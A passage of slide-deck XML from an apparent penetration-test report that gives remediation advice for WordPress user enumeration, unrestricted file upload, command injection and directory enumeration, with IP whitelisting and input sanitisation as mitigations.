                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>IP whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> is a security feature often used for limiting and controlling access only to trusted users. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>IP whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> allows you to create lists of trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> addresses or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> ranges from which your users can access your domains.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to whitelist an IP Address in your SSH:</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect to your server through SSH as a ‘root’ user.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run command:   /scripts/cphulkdwhitelist/ &lt;your.IP.being.whitelisted&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="3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17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‘Wordpress User Enumeration’ on Target 1</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2623" name="Google Shape;2623;p17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24" name="Google Shape;2624;p171"/>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sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordpress is vulnerable to ‘User Enumeration’ by default due to the Wordpress feature, called “Permalinks.” User enumeration doesn’t have a direct impact on the server, but this vulnerability is often used to gather more information about the server so that a hacker can carry out an attack.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordpress User Enumeration can not be fully patched but there are a few partial patches that can help to stave off/demotivate hackers. Some of these patches include:</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disable WordPress REST API and/or JSON REST API</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This patch can be completed via the “Disable REST API Plug-in   </a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Disable WordPress XML-RPC</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>This patch can be completed via the Disable XML-RPC Plug-in or by pasting the code, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400"/>
              <a:t>add_filter('xmlrpc_enabled', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'__return_false'); into another site-specific plug-in.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Hide the /wp-admin and /wp-login.php from public view on the internet.</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-444500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This patch can be completed via WPS Hide Login Plug-in, or by modifying your .htaccess file </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(directions for how to do this can be found at the following link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pagely.com/blog/hiding-wordpress-login-page/</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information regarding WordPress User Enumeration sourced from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.wpwhitesecurity.com/enumerate-wordpress-users-wpscan-security-scanner/</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="36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17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Unrestricted File Upload on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2630" name="Google Shape;2630;p17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31" name="Google Shape;2631;p172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="124950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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Patch: File Checking &amp; Allow List</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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Unrestricted file uploads occur when there is little in place to inspect or restrict what is uploaded to a server</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To the right is an example of a java file checking program that checks “fileType” against previously defined files</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Allow listing file extensions is a way to limit attack surface to only extensions strictly needed for development</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2632" name="Google Shape;2632;p172"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="8625" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12092650" y="3180525"/>
            <a:ext cx="10855452" cy="7189850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2633" name="Google Shape;2633;p172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12092650" y="10863750"/>
            <a:ext cx="11117700" cy="11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info from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>, screen shot from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://dzone.com/articles/determining-file-types-java\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t> </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7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Command Injection on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2639" name="Google Shape;2639;p17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40" name="Google Shape;2640;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730950" y="2295400"/>
            <a:ext cx="21104100" cy="46626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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Sanitation &amp; API’s</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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Command injection occurs when an threat actor is able to execute shell command on your server</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The code in the bottom left is an example of Input sanitation of special characters needed to create these commands can be a mitigation for these attacks</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2641" name="Google Shape;2641;p173"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2534" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10732675" y="7680825"/>
            <a:ext cx="12402954" cy="4662600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2642" name="Google Shape;2642;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400300" y="11796000"/>
            <a:ext cx="8940000" cy="14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Info from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.hacksplaining.com/prevention/command-execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> screenshot from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.smashingmagazine.com/2011/01/keeping-web-users-safe-by-sanitizing-input-data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2643" name="Google Shape;2643;p173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730950" y="6981000"/>
            <a:ext cx="10319100" cy="4662600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="24375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Using API’s as much as possible instead of command line is another way to limit the use of these powerful commands</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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7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Bruteforce on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2649" name="Google Shape;2649;p17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50" name="Google Shape;2650;p174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="107646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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Disabling Directory Listing</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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gobuster application uses a wordlist to enumerate the directories of a website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By disabling directory listings on your server, applications like gobuster will not be able to enumerate your directories since they are taken off the directory list</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
